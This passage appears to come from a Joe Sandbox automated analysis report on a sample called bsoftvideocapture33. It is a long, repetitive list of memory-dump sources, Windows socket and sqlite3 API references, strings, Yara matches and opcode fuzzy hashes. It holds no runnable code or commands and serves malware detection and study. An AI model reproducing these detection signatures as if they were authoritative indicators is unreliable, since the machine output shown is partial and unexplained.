                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1477753154-0
                                                                                                                                        • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                                                                        • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                                                                        • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                                                                        • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C02009
                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 02C02028
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C02037
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C0204E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2456309408-0
                                                                                                                                        • Opcode ID: ac925957b5bf25a90782f880e1ff147f0f3091eb794852fb380e09897aafd828
                                                                                                                                        • Instruction ID: 16fe9829141fe66bd347efeccb5c0e3dc95a375179b9a29d22c99301b00d829a
                                                                                                                                        • Opcode Fuzzy Hash: ac925957b5bf25a90782f880e1ff147f0f3091eb794852fb380e09897aafd828
                                                                                                                                        • Instruction Fuzzy Hash: 330181714007649BC738AF54E848B9AB7B9FF04309F404A1DE84693590CF74AA58DFD5
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event$H_prologSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1765829285-0
                                                                                                                                        • Opcode ID: b80747bd0e79432af5b466f6484bc793131748795d595944ae3dfad532452386
                                                                                                                                        • Instruction ID: 28510ff18218f339beb00c22d3d78bd580c81ab8f99a3ec6ce007f06810a1dcb
                                                                                                                                        • Opcode Fuzzy Hash: b80747bd0e79432af5b466f6484bc793131748795d595944ae3dfad532452386
                                                                                                                                        • Instruction Fuzzy Hash: DCF09031650110EFCB109F94D8C8B89BBA4FF0D321F0081A9F9099B280CB349814CBA1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: into$out of
                                                                                                                                        • API String ID: 632333372-1114767565
                                                                                                                                        • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                                                        • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                                                                        • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                                                        • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog_memmove
                                                                                                                                        • String ID: &'
                                                                                                                                        • API String ID: 3529519853-655172784
                                                                                                                                        • Opcode ID: 0006ccddd26ea7168223dce5cf2b403306cb2127c278faa712716f0f4fbfedb7
                                                                                                                                        • Instruction ID: 45a774e1c1c2a920a211bb92656f94c830930f1ca84a108287e10cbe26b49e84
                                                                                                                                        • Opcode Fuzzy Hash: 0006ccddd26ea7168223dce5cf2b403306cb2127c278faa712716f0f4fbfedb7
                                                                                                                                        • Instruction Fuzzy Hash: D961AE71D00219DBDF20EFA4C981BEEFBB6AF48710F10816AD519BB291D7709A05DFA1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_value_text
                                                                                                                                        • String ID: (NULL)$NULL
                                                                                                                                        • API String ID: 2175239460-873412390
                                                                                                                                        • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                                                        • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                                                                        • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                                                        • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: -- $d
                                                                                                                                        • API String ID: 632333372-777087308
                                                                                                                                        • Opcode ID: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                                                        • Instruction ID: d45f625f7ed72e8bd0cbe86fb5af212c953cff4c7e5ffbb26f6c4a79540968e1
                                                                                                                                        • Opcode Fuzzy Hash: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                                                        • Instruction Fuzzy Hash: FB51F674A043689BDB26CF28C980789BBFABF55304F1481D9E89CAB341C7759E85CF40
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(?,00000000), ref: 00405BB3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info
                                                                                                                                        • String ID: $
                                                                                                                                        • API String ID: 1807457897-3032137957
                                                                                                                                        • Opcode ID: 8be919fd1f317d968f1dd7194145b7f748f3cf7c70e6a819b272ea0fad10816c
                                                                                                                                        • Instruction ID: a56a174cbc4f2354ce51958eba1d0621761effbb059f2287080cdd9d93e72df2
                                                                                                                                        • Opcode Fuzzy Hash: 8be919fd1f317d968f1dd7194145b7f748f3cf7c70e6a819b272ea0fad10816c
                                                                                                                                        • Instruction Fuzzy Hash: 974168300187589AFB119764CD89BFB3FA8DB05700F1400FAD986FB1D3C23949589FAA
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: string or blob too big$|
                                                                                                                                        • API String ID: 632333372-330586046
                                                                                                                                        • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                                                        • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                                                                        • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                                                        • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02C02D39: WSASetLastError.WS2_32(00000000), ref: 02C02D47
                                                                                                                                          • Part of subcall function 02C02D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02C02D5C
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02C02E6D
                                                                                                                                        • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C02E83
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$Sendselect
                                                                                                                                        • String ID: 3'
                                                                                                                                        • API String ID: 2958345159-280543908
                                                                                                                                        • Opcode ID: 4291146dac4d1dcbf5a7b4ed93c5507860d434c92d2bbc5ccb4216a76fb5a2de
                                                                                                                                        • Instruction ID: 00eb409e94d0436895fbe47b506366a82c8f41438f63623392e2a4485a759e77
                                                                                                                                        • Opcode Fuzzy Hash: 4291146dac4d1dcbf5a7b4ed93c5507860d434c92d2bbc5ccb4216a76fb5a2de
                                                                                                                                        • Instruction Fuzzy Hash: F031B270A003059FDF10EF60C8987EEBBAAAF44354F00455ADD04972C0EB719995DFA1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_logsqlite3_value_text
                                                                                                                                        • String ID: string or blob too big
                                                                                                                                        • API String ID: 2320820228-2803948771
                                                                                                                                        • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                                                        • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                                                                        • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                                                        • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                                                                        APIs
                                                                                                                                        • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C073D8,?,?,00000000), ref: 02C086D5
                                                                                                                                        • getsockname.WS2_32(?,?,?), ref: 02C086EB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastgetsockname
                                                                                                                                        • String ID: &'
                                                                                                                                        • API String ID: 566540725-655172784
                                                                                                                                        • Opcode ID: db2886b4e7fe14920573c9b3d3e3f698796415332006b43d8528daa566ad4deb
                                                                                                                                        • Instruction ID: 502eec02bc56dafe6cd881f4aefd130faeaf5b7dbeb6f48f972ee21f6c09bbe3
                                                                                                                                        • Opcode Fuzzy Hash: db2886b4e7fe14920573c9b3d3e3f698796415332006b43d8528daa566ad4deb
                                                                                                                                        • Instruction Fuzzy Hash: FA216571A002089FDB10DFA8D895ACEB7F5FF48324F11C56AE918EB280DB30E9458B50
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0BCB9
                                                                                                                                          • Part of subcall function 02C0C295: std::exception::exception.LIBCMT ref: 02C0C2C4
                                                                                                                                          • Part of subcall function 02C0CA4B: __EH_prolog.LIBCMT ref: 02C0CA50
                                                                                                                                          • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
                                                                                                                                          • Part of subcall function 02C0C2F4: __EH_prolog.LIBCMT ref: 02C0C2F9
                                                                                                                                        Strings
                                                                                                                                        • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C0BCF6
                                                                                                                                        • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C0BCEF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                                                        • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                                                                        • API String ID: 1953324306-1943798000
                                                                                                                                        • Opcode ID: 70f24a98251657bf2c8466230e8848b4966103e4abb3feecbce3d7d08ec59fc3
                                                                                                                                        • Instruction ID: ed107f9541ed3922d98b784833eed6f6d4269c7b2a8c4d6a57627b2b346e11cf
                                                                                                                                        • Opcode Fuzzy Hash: 70f24a98251657bf2c8466230e8848b4966103e4abb3feecbce3d7d08ec59fc3
                                                                                                                                        • Instruction Fuzzy Hash: 182191B1E002689BDB14EFE8D4947AEBBB9EF58704F00455EE805BB280DF705A04DF51
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0BDAE
                                                                                                                                          • Part of subcall function 02C0C36C: std::exception::exception.LIBCMT ref: 02C0C399
                                                                                                                                          • Part of subcall function 02C0CB82: __EH_prolog.LIBCMT ref: 02C0CB87
                                                                                                                                          • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
                                                                                                                                          • Part of subcall function 02C0C3C9: __EH_prolog.LIBCMT ref: 02C0C3CE
                                                                                                                                        Strings
                                                                                                                                        • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C0BDEB
                                                                                                                                        • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C0BDE4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                                                        • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                                                                        • API String ID: 1953324306-412195191
                                                                                                                                        • Opcode ID: c59e3f04963de8f6f45fa0d1b4328815812245b620426025e35c9c398f361dbd
                                                                                                                                        • Instruction ID: 45011778f4db894a3f0a82dfc1136cf16bac27f1359a734f124cf5bd765771e2
                                                                                                                                        • Opcode Fuzzy Hash: c59e3f04963de8f6f45fa0d1b4328815812245b620426025e35c9c398f361dbd
                                                                                                                                        • Instruction Fuzzy Hash: 2F21A0B1E002549ADB04EFE4D4907EEBBB9EF48704F00065EE905A7281CF705A04DB91
                                                                                                                                        APIs
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02C02AEA
                                                                                                                                        • connect.WS2_32(?,?,?), ref: 02C02AF5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastconnect
                                                                                                                                        • String ID: 3'
                                                                                                                                        • API String ID: 374722065-280543908
                                                                                                                                        • Opcode ID: e4b9eb710cc5cbba24b4271525d41698414855e061a354c28da069b45d93191e
                                                                                                                                        • Instruction ID: c4ec4f1b115e04d4503a278c99ca5ae690be26098fbba838096857ad44229a5b
                                                                                                                                        • Opcode Fuzzy Hash: e4b9eb710cc5cbba24b4271525d41698414855e061a354c28da069b45d93191e
                                                                                                                                        • Instruction Fuzzy Hash: 2221C970E00214ABCF24FFB4D4987AEBBBAEF84364F104599DD19972C0DB7446459F91
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3265351223-3916222277
                                                                                                                                        • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                                                        • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                                                                        • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                                                        • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_stricmp
                                                                                                                                        • String ID: log
                                                                                                                                        • API String ID: 912767213-2403297477
                                                                                                                                        • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                                                        • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                                                                        • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                                                        • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0396A
                                                                                                                                        • std::runtime_error::runtime_error.LIBCPMT ref: 02C039C1
                                                                                                                                          • Part of subcall function 02C01410: std::exception::exception.LIBCMT ref: 02C01428
                                                                                                                                          • Part of subcall function 02C09623: __EH_prolog.LIBCMT ref: 02C09628
                                                                                                                                          • Part of subcall function 02C09623: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C09637
                                                                                                                                          • Part of subcall function 02C09623: __CxxThrowException@8.LIBCMT ref: 02C09656
                                                                                                                                        Strings
                                                                                                                                        • Day of month is not valid for year, xrefs: 02C039AC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                        • String ID: Day of month is not valid for year
                                                                                                                                        • API String ID: 1404951899-1521898139
                                                                                                                                        • Opcode ID: 9b40ce4fa4b6667b3c1bcda1adfecfb8851a3fd89ef13ac3cee5e50c25d8a065
                                                                                                                                        • Instruction ID: 38934e8233b9a5168acbccf5fddd6a80853d73d46e8d9630d696f6e42178d960
                                                                                                                                        • Opcode Fuzzy Hash: 9b40ce4fa4b6667b3c1bcda1adfecfb8851a3fd89ef13ac3cee5e50c25d8a065
                                                                                                                                        • Instruction Fuzzy Hash: EF01B17AC14249AADF05EFA4D841BEEB779FF14B10F00441AFC00A7240EB744B54DBA5
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_strnicmp
                                                                                                                                        • String ID: SQLITE_
                                                                                                                                        • API String ID: 1961171630-787686576
                                                                                                                                        • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
